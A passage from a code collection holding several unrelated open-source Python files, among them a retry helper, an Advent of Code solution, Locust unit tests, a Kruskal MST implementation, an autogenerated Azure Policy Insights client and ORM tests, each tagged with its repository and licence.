        except tolerated_errors as error:  #IGNORE:W0703
# One of our anticipated errors happened.
if retries:
# We've got more retries left. Log the error, and continue.
show_exception_info(log_prefix)
if delay:
time.sleep(delay_time)
delay_time = delay_time * delay_multiplier
else:
delay_time = 0
logging.info('We have %d tries left. Delaying for %.2f seconds and trying again.', retries, delay_time)
else:
logging.warn('Could not complete action after %d retries.', retries)
if critical:
logging.error('Critical action failed.')
raise error
except Exception:
            # We've received an error we didn't anticipate. This is bad.
            # Depending on the error, the developers should either fix something or, if we want to tolerate it,
# add it to our tolerated_errors.
# Those things require human judgement, so we'll raise the exception.
            logging.exception('Unanticipated error received!')  # Log the exception
raise #Re-raise
except:
typ, value, unused = sys.exc_info()
# We've received an exception that isn't even an Exception subclass!
# This is bad manners - see http://docs.python.org/tutorial/errors.html:
# "Exceptions should typically be derived from the Exception class, either directly or indirectly."
logging.exception("Bad mannered exception. Class was: %s Value was: %s Source file: %s", typ.__name__, str(value), inspect.getsourcefile(typ))
raise
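# A minimal usage sketch (flaky_fetch and its URL are hypothetical, not part of
# this module): retry a network call up to 3 times with exponential backoff and
# re-raise the error if every attempt fails.
#
# def flaky_fetch(url):
#     ...  # may raise IOError intermittently
#
# result = run_resilient(
#     flaky_fetch,
#     function_args=['http://example.com'],
#     tolerated_errors=(IOError,),
#     retries=3,
#     critical=True,
# )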
| mikemaccana/resilience | __init__.py | Python | mit | 2,874 |
#!/usr/bin/env python
"""
Solve day 23 of Advent of Code.
http://adventofcode.com/day/23
"""
class Computer:
def __init__(self):
"""
Our computer has 2 registers, a and b,
and an instruction pointer so that we know
which instruction to fetch next.
"""
self.a = 0
self.b = 0
self.ip = 0 # Ye olde instruction pointer
def run_program(self, program):
"""
Run a list of program instructions until we
try to move the instruction pointer beyond
the bounds of the instruction list.
"""
while True:
try:
instruction, args = self.parse_instruction(program[self.ip])
except IndexError:
return
getattr(self, instruction)(*args)
def parse_instruction(self, line):
"""
Parse a line of the program into
the instruction and its arguments.
"""
instruction, *args = line.strip().replace(',', '').split()
return instruction, args
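    # For example, parse_instruction("jio a, +2") strips the comma and splits on
    # whitespace, giving ('jio', ['a', '+2']).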
def hlf(self, register):
"""
Set the register to half its current value,
then increment the instruction pointer.
"""
setattr(self, register, getattr(self, register)//2)
self.ip += 1
def tpl(self, register):
"""
Set the register to triple its current value,
then increment the instruction pointer.
"""
setattr(self, register, getattr(self, register)*3)
self.ip += 1
def inc(self, register):
"""
Increment the value in the register,
then increment the instruction pointer.
"""
setattr(self, register, getattr(self, register) + 1)
self.ip += 1
def jmp(self, offset):
"""
Jump the instruction pointer by a particular offset.
"""
self.ip += int(offset)
def jie(self, register, offset):
"""
Jump the instruction pointer by an offset
if the value in the register is even.
"""
if getattr(self, register) % 2 == 0:
self.jmp(offset)
else:
self.ip += 1
def jio(self, register, offset):
"""
Jump the instruction pointer by an offset
if the value in the register is one.
"""
if getattr(self, register) == 1:
self.jmp(offset)
else:
self.ip += 1
if __name__ == '__main__':
with open('input.txt') as f:
program = f.readlines()
computer = Computer()
# Part 1 - start with a=0, b=0
computer.run_program(program)
print("Part 1:", computer.b)
# Part 2 - now start with a=1, b=0
computer = Computer()
computer.a = 1
computer.run_program(program)
print("Part 2:", computer.b)
| mpirnat/adventofcode | day23/day23.py | Python | mit | 2,854 |
import subprocess
import os
import errno
def download_file(url, local_fname=None, force_write=False):
# requests is not default installed
import requests
if local_fname is None:
local_fname = url.split('/')[-1]
if not force_write and os.path.exists(local_fname):
return local_fname
dir_name = os.path.dirname(local_fname)
if dir_name != "":
if not os.path.exists(dir_name):
try: # try to create the directory if it doesn't exists
os.makedirs(dir_name)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
r = requests.get(url, stream=True)
assert r.status_code == 200, "failed to open %s" % url
with open(local_fname, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
return local_fname
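# A minimal usage sketch (URL and local path are placeholders): the first call
# downloads the file, later calls reuse the cached copy unless force_write=True.
#
# path = download_file('http://example.com/data/train.csv', 'data/train.csv')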
def get_gpus():
"""
    Return the indices of the available GPUs (empty if nvidia-smi cannot be run).
"""
try:
re = subprocess.check_output(["nvidia-smi", "-L"], universal_newlines=True)
except OSError:
return []
return range(len([i for i in re.split('\n') if 'GPU' in i]))
| yancz1989/lr_semi | common/util.py | Python | mit | 1,092 |
import unittest
from locust.util.timespan import parse_timespan
from locust.util.rounding import proper_round
class TestParseTimespan(unittest.TestCase):
def test_parse_timespan_invalid_values(self):
self.assertRaises(ValueError, parse_timespan, None)
self.assertRaises(ValueError, parse_timespan, "")
self.assertRaises(ValueError, parse_timespan, "q")
def test_parse_timespan(self):
self.assertEqual(7, parse_timespan("7"))
self.assertEqual(7, parse_timespan("7s"))
self.assertEqual(60, parse_timespan("1m"))
self.assertEqual(7200, parse_timespan("2h"))
self.assertEqual(3787, parse_timespan("1h3m7s"))
class TestRounding(unittest.TestCase):
def test_rounding_down(self):
self.assertEqual(1, proper_round(1.499999999))
self.assertEqual(5, proper_round(5.499999999))
self.assertEqual(2, proper_round(2.05))
self.assertEqual(3, proper_round(3.05))
def test_rounding_up(self):
self.assertEqual(2, proper_round(1.5))
self.assertEqual(3, proper_round(2.5))
self.assertEqual(4, proper_round(3.5))
self.assertEqual(5, proper_round(4.5))
self.assertEqual(6, proper_round(5.5))
| heyman/locust | locust/test/test_util.py | Python | mit | 1,232 |
# This module is free software. You can redistribute it and/or modify it under
# the terms of the MIT License, see the file COPYING included with this
# distribution.
from __future__ import division
"""
main.py -- main program of motif sequence coverage pipeline tool
example for running code: python main.py -jid test -confFile ./data/default_scan_only.conf
This will create a results folder with the name test. You will need to delete the folder if you want to run the code again with the same name
"""
#python imports
import sys
import os
import argparse
import shutil
#add the util folder path to use util files in it
inPath = os.path.realpath(__file__)
split = inPath.split('/')
inPath = '/'.join(split[:len(split)-1])
sys.path.append(inPath + '/utils')
import conf
import general_utils
import Fimo
import Tomtom
#add the alg folder path to call the different algorithms
sys.path.append(inPath + '/algo')
import greedy
import motif_pwm_scan_cov
import motif_pwm_scan_only
#MAIN
def main(args):
#example for running code: python main.py -jid test -confFile ./data/default_scan_only.conf
print "main.py::main()"
parser = argparse.ArgumentParser()
parser.add_argument("-jid", "--jid", help="enter job ID") #job id to make a folder to store all the data for a specific job
parser.add_argument("-confFile", "--confFile", help="enter the configuration file")#path to configuration file
args = parser.parse_args()
print 'jobId:', args.jid,'configfile:', args.confFile
#make a results directory to store job results
resultsDirName = args.jid
os.makedirs(resultsDirName)
#make a file list to store all the files to be moved to the results folder
fileList = []
#copy the config file
cpConfFileName = args.jid + '_in_conf_file'
cpConfFile = open(cpConfFileName, 'wb')
with open(args.confFile, 'rb') as handler:
for line in handler:
cpConfFile.write(line)
cpConfFile.close()
fileList.append(cpConfFileName)
#make a config object
confObj = conf.Conf()
confDict = confObj.read(args.confFile)
############
#Have a PWM file and want to scan it across a fasta file and then apply sequence coverage
############
if confDict['job.type']['type'] == 'motifPwmScanCov':
print 'motif_pwm scanning and coverage operation'
motif_pwm_scan_cov.callMotifPwmScanCov(args, confDict, fileList)
#move files to results folder
for outFile in fileList:
shutil.move(outFile, resultsDirName)
exit()
############
#Have a PWM file and want to scan it across a file only
############
if confDict['job.type']['type'] == 'pwmScan':
print 'motif pwm scanning only'
motif_pwm_scan_only.callMotifPwmScanOnly(args, confDict, fileList)
#move files to results folder
for outFile in fileList:
shutil.move(outFile, resultsDirName)
exit()
###############
#EXIT
###############
exit()
#calling main
if( __name__ == "__main__" ):
main(sys.argv)
| RamiOran/SeqCov | main.py | Python | mit | 3,137 |
from __future__ import annotations
from typing import Generic, TypeVar
T = TypeVar("T")
class DisjointSetTreeNode(Generic[T]):
# Disjoint Set Node to store the parent and rank
def __init__(self, data: T) -> None:
self.data = data
self.parent = self
self.rank = 0
class DisjointSetTree(Generic[T]):
# Disjoint Set DataStructure
def __init__(self) -> None:
# map from node name to the node object
self.map: dict[T, DisjointSetTreeNode[T]] = {}
def make_set(self, data: T) -> None:
# create a new set with x as its member
self.map[data] = DisjointSetTreeNode(data)
def find_set(self, data: T) -> DisjointSetTreeNode[T]:
# find the set x belongs to (with path-compression)
elem_ref = self.map[data]
if elem_ref != elem_ref.parent:
elem_ref.parent = self.find_set(elem_ref.parent.data)
return elem_ref.parent
def link(
self, node1: DisjointSetTreeNode[T], node2: DisjointSetTreeNode[T]
) -> None:
# helper function for union operation
if node1.rank > node2.rank:
node2.parent = node1
else:
node1.parent = node2
if node1.rank == node2.rank:
node2.rank += 1
def union(self, data1: T, data2: T) -> None:
# merge 2 disjoint sets
self.link(self.find_set(data1), self.find_set(data2))
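# A minimal usage sketch of the disjoint-set structure on its own (values are
# illustrative): after union(1, 2), both elements resolve to the same root node.
#
# dst = DisjointSetTree[int]()
# for node in (1, 2, 3):
#     dst.make_set(node)
# dst.union(1, 2)
# assert dst.find_set(1) is dst.find_set(2)
# assert dst.find_set(1) is not dst.find_set(3)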
class GraphUndirectedWeighted(Generic[T]):
def __init__(self) -> None:
# connections: map from the node to the neighbouring nodes (with weights)
self.connections: dict[T, dict[T, int]] = {}
def add_node(self, node: T) -> None:
# add a node ONLY if its not present in the graph
if node not in self.connections:
self.connections[node] = {}
def add_edge(self, node1: T, node2: T, weight: int) -> None:
# add an edge with the given weight
self.add_node(node1)
self.add_node(node2)
self.connections[node1][node2] = weight
self.connections[node2][node1] = weight
def kruskal(self) -> GraphUndirectedWeighted[T]:
# Kruskal's Algorithm to generate a Minimum Spanning Tree (MST) of a graph
"""
Details: https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
Example:
>>> g1 = GraphUndirectedWeighted[int]()
>>> g1.add_edge(1, 2, 1)
>>> g1.add_edge(2, 3, 2)
>>> g1.add_edge(3, 4, 1)
>>> g1.add_edge(3, 5, 100) # Removed in MST
>>> g1.add_edge(4, 5, 5)
>>> assert 5 in g1.connections[3]
>>> mst = g1.kruskal()
>>> assert 5 not in mst.connections[3]
>>> g2 = GraphUndirectedWeighted[str]()
>>> g2.add_edge('A', 'B', 1)
>>> g2.add_edge('B', 'C', 2)
>>> g2.add_edge('C', 'D', 1)
>>> g2.add_edge('C', 'E', 100) # Removed in MST
>>> g2.add_edge('D', 'E', 5)
>>> assert 'E' in g2.connections["C"]
>>> mst = g2.kruskal()
>>> assert 'E' not in mst.connections['C']
"""
# getting the edges in ascending order of weights
edges = []
seen = set()
for start in self.connections:
for end in self.connections[start]:
if (start, end) not in seen:
seen.add((end, start))
edges.append((start, end, self.connections[start][end]))
edges.sort(key=lambda x: x[2])
# creating the disjoint set
disjoint_set = DisjointSetTree[T]()
for node in self.connections:
disjoint_set.make_set(node)
# MST generation
num_edges = 0
index = 0
graph = GraphUndirectedWeighted[T]()
while num_edges < len(self.connections) - 1:
u, v, w = edges[index]
index += 1
parent_u = disjoint_set.find_set(u)
parent_v = disjoint_set.find_set(v)
if parent_u != parent_v:
num_edges += 1
graph.add_edge(u, v, w)
disjoint_set.union(u, v)
return graph
| TheAlgorithms/Python | graphs/minimum_spanning_tree_kruskal2.py | Python | mit | 4,095 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PolicyTrackedResourcesOperations:
"""PolicyTrackedResourcesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.policyinsights.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_query_results_for_management_group(
self,
management_group_name: str,
query_options: Optional["_models.QueryOptions"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyTrackedResourcesQueryResults"]:
"""Queries policy tracked resources under the management group.
:param management_group_name: Management group name.
:type management_group_name: str
:param query_options: Parameter group.
:type query_options: ~azure.mgmt.policyinsights.models.QueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyTrackedResourcesQueryResults or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.policyinsights.models.PolicyTrackedResourcesQueryResults]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyTrackedResourcesQueryResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_top = None
_filter = None
if query_options is not None:
_top = query_options.top
_filter = query_options.filter
management_groups_namespace = "Microsoft.Management"
policy_tracked_resources_resource = "default"
api_version = "2018-07-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_query_results_for_management_group.metadata['url'] # type: ignore
path_format_arguments = {
'managementGroupsNamespace': self._serialize.url("management_groups_namespace", management_groups_namespace, 'str'),
'managementGroupName': self._serialize.url("management_group_name", management_group_name, 'str'),
'policyTrackedResourcesResource': self._serialize.url("policy_tracked_resources_resource", policy_tracked_resources_resource, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if _top is not None:
query_parameters['$top'] = self._serialize.query("top", _top, 'int', minimum=0)
if _filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", _filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PolicyTrackedResourcesQueryResults', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.QueryFailure, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_query_results_for_management_group.metadata = {'url': '/providers/{managementGroupsNamespace}/managementGroups/{managementGroupName}/providers/Microsoft.PolicyInsights/policyTrackedResources/{policyTrackedResourcesResource}/queryResults'} # type: ignore
def list_query_results_for_subscription(
self,
query_options: Optional["_models.QueryOptions"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyTrackedResourcesQueryResults"]:
"""Queries policy tracked resources under the subscription.
:param query_options: Parameter group.
:type query_options: ~azure.mgmt.policyinsights.models.QueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyTrackedResourcesQueryResults or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.policyinsights.models.PolicyTrackedResourcesQueryResults]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyTrackedResourcesQueryResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_top = None
_filter = None
if query_options is not None:
_top = query_options.top
_filter = query_options.filter
policy_tracked_resources_resource = "default"
api_version = "2018-07-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_query_results_for_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'policyTrackedResourcesResource': self._serialize.url("policy_tracked_resources_resource", policy_tracked_resources_resource, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if _top is not None:
query_parameters['$top'] = self._serialize.query("top", _top, 'int', minimum=0)
if _filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", _filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PolicyTrackedResourcesQueryResults', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.QueryFailure, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_query_results_for_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.PolicyInsights/policyTrackedResources/{policyTrackedResourcesResource}/queryResults'} # type: ignore
def list_query_results_for_resource_group(
self,
resource_group_name: str,
query_options: Optional["_models.QueryOptions"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyTrackedResourcesQueryResults"]:
"""Queries policy tracked resources under the resource group.
:param resource_group_name: Resource group name.
:type resource_group_name: str
:param query_options: Parameter group.
:type query_options: ~azure.mgmt.policyinsights.models.QueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyTrackedResourcesQueryResults or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.policyinsights.models.PolicyTrackedResourcesQueryResults]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyTrackedResourcesQueryResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_top = None
_filter = None
if query_options is not None:
_top = query_options.top
_filter = query_options.filter
policy_tracked_resources_resource = "default"
api_version = "2018-07-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_query_results_for_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyTrackedResourcesResource': self._serialize.url("policy_tracked_resources_resource", policy_tracked_resources_resource, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if _top is not None:
query_parameters['$top'] = self._serialize.query("top", _top, 'int', minimum=0)
if _filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", _filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PolicyTrackedResourcesQueryResults', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.QueryFailure, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_query_results_for_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.PolicyInsights/policyTrackedResources/{policyTrackedResourcesResource}/queryResults'} # type: ignore
def list_query_results_for_resource(
self,
resource_id: str,
query_options: Optional["_models.QueryOptions"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyTrackedResourcesQueryResults"]:
"""Queries policy tracked resources under the resource.
:param resource_id: Resource ID.
:type resource_id: str
:param query_options: Parameter group.
:type query_options: ~azure.mgmt.policyinsights.models.QueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyTrackedResourcesQueryResults or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.policyinsights.models.PolicyTrackedResourcesQueryResults]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyTrackedResourcesQueryResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_top = None
_filter = None
if query_options is not None:
_top = query_options.top
_filter = query_options.filter
policy_tracked_resources_resource = "default"
api_version = "2018-07-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_query_results_for_resource.metadata['url'] # type: ignore
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True),
'policyTrackedResourcesResource': self._serialize.url("policy_tracked_resources_resource", policy_tracked_resources_resource, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if _top is not None:
query_parameters['$top'] = self._serialize.query("top", _top, 'int', minimum=0)
if _filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", _filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PolicyTrackedResourcesQueryResults', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.QueryFailure, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_query_results_for_resource.metadata = {'url': '/{resourceId}/providers/Microsoft.PolicyInsights/policyTrackedResources/{policyTrackedResourcesResource}/queryResults'} # type: ignore
| Azure/azure-sdk-for-python | sdk/policyinsights/azure-mgmt-policyinsights/azure/mgmt/policyinsights/aio/operations/_policy_tracked_resources_operations.py | Python | mit | 19,738 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-18 07:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('primus', '0006_auto_20160418_0959'),
]
operations = [
migrations.AlterField(
model_name='building',
name='modified',
field=models.DateTimeField(auto_now=True),
),
]
| sighill/shade_app | primus/migrations/0007_auto_20160418_0959.py | Python | mit | 457 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bikes_prediction.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| cheer021/BikesPrediction_DP | bikes_prediction/manage.py | Python | mit | 259 |
# -*- coding: utf-8 -*-
# Copyright (c) 2013–2015 Molly White
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import codecs, logging, os, util
from tokenizer import Tokenizer
from tokenparser import Parser
from api import Document
def setup_logging():
logger=logging.getLogger("W2L")
logger.setLevel(logging.DEBUG)
console_formatter = logging.Formatter("%(asctime)s - %(levelname)s"
": %(message)s", datefmt="%I:%M:%S %p")
consolehandler = logging.StreamHandler()
consolehandler.setFormatter(console_formatter)
logger.addHandler(consolehandler)
return logger
if __name__ == "__main__":
logger = setup_logging()
doc = Document()
doc.organize()
if not os.path.exists(os.curdir + '/raw'):
logger.debug("Getting raw text files.")
doc.call()
if not os.path.exists(os.curdir + '/text'):
logger.debug("Parsing JSON to TXT.")
doc.json_to_text()
# Open and read files
tokenizer = Tokenizer()
progress = util.ProgressChecker()
parser = Parser(progress)
    if not os.path.exists(os.curdir + '/latex'):
        os.mkdir(os.curdir + '/latex')
#folders = sorted(os.listdir(path=(os.curdir + '/text')), key=int)
folders = ['0', '1', '2', '3']
for folder in folders:
files = sorted(os.listdir(path=(os.curdir + '/text/' + folder)), key=lambda x: int(x[0]))
if folder == '3':
files = ['0.txt', '1.txt']
with codecs.open(os.curdir + '/latex/' + folder + '.tex', 'w+', 'utf-8') as outputfile:
last_open = os.curdir + '/latex/' + folder + '.tex'
for file in files:
logger.debug("Parsing " + folder + "/" + file + " to " + folder + ".tex.")
with codecs.open(os.curdir + '/text/' + folder + '/' + file, 'r', 'utf-8') as f:
data = f.read()
token_list = tokenizer.analyze(data)
parser.begin(outputfile)
parser.dispatch(token_list)
print("Total number of pages included in main pages: " + str(doc.num_pages))
progress.get_statistics()
# with codecs.open(last_open, 'a', 'utf-8') as outputfile:
# contributors = doc.attribute()
# parser.end_matter(contributors, outputfile)
logger.debug("Parsing complete.") | molly/Wikisource-to-LaTeX | core.py | Python | mit | 3,449 |
"""Testing for ORM"""
from unittest import TestCase
import nose
from nose.tools import eq_
from sets import Set
from mdcorpus.orm import *
class ORMTestCase(TestCase):
def setUp(self):
self.store = Store(create_database("sqlite:"))
self.store.execute(MovieTitlesMetadata.CREATE_SQL)
self.store.execute(MovieCharactersMetadata.CREATE_SQL)
self.store.execute(RawScriptUrl.CREATE_SQL)
self.store.execute(MovieConversation.CREATE_SQL)
self.store.execute(MovieLine.CREATE_SQL)
movie = self.store.add(MovieTitlesMetadata(0,
u"10 things i hate about you",
1999,
6.90,
62847))
bianca = self.store.add(MovieCharactersMetadata(0,
"BIANCA",
"f",
4))
bruce = self.store.add(MovieCharactersMetadata(1,
"BRUCE",
"?",
"?"))
cameron = self.store.add(MovieCharactersMetadata(2,
"CAMERON",
"m",
"3"))
url = self.store.add(RawScriptUrl("http://www.dailyscript.com/scripts/10Things.html"))
conversation = self.store.add(MovieConversation(0, 2, 0))
line194 = self.store.add(MovieLine(
194, "Can we make this quick? Roxanne Korrine and Andrew Barrett are having an incredibly horrendous public break- up on the quad. Again."))
line195 = self.store.add(MovieLine(
195, "Well, I thought we'd start with pronunciation, if that's okay with you."))
line196 = self.store.add(MovieLine(
196, "Not the hacking and gagging and spitting part. Please."))
line197 = self.store.add(MovieLine(
197, "Okay... then how 'bout we try out some French cuisine. Saturday? Night?"))
self.store.flush()
movie.characters.add(bianca)
movie.characters.add(bruce)
movie.characters.add(cameron)
url.movie = movie
line_id_list = [194, 195, 196, 197]
for (i, line_id) in enumerate(line_id_list):
line = self.store.find(MovieLine, MovieLine.id == line_id).one()
line.number = i + 1
conversation.lines.add(line)
self.store.commit()
def tearDown(self):
print "done"
class MovieTitlesMetadataTestCase(ORMTestCase):
@nose.with_setup(ORMTestCase.setUp, ORMTestCase.tearDown)
def test_url(self):
movie = self.store.find(MovieTitlesMetadata, MovieTitlesMetadata.id == 0).one()
eq_(movie.url(), "http://www.dailyscript.com/scripts/10Things.html")
class MovieCharactersMetadataTestCase(ORMTestCase):
@nose.with_setup(ORMTestCase.setUp, ORMTestCase.tearDown)
def test_gender(self):
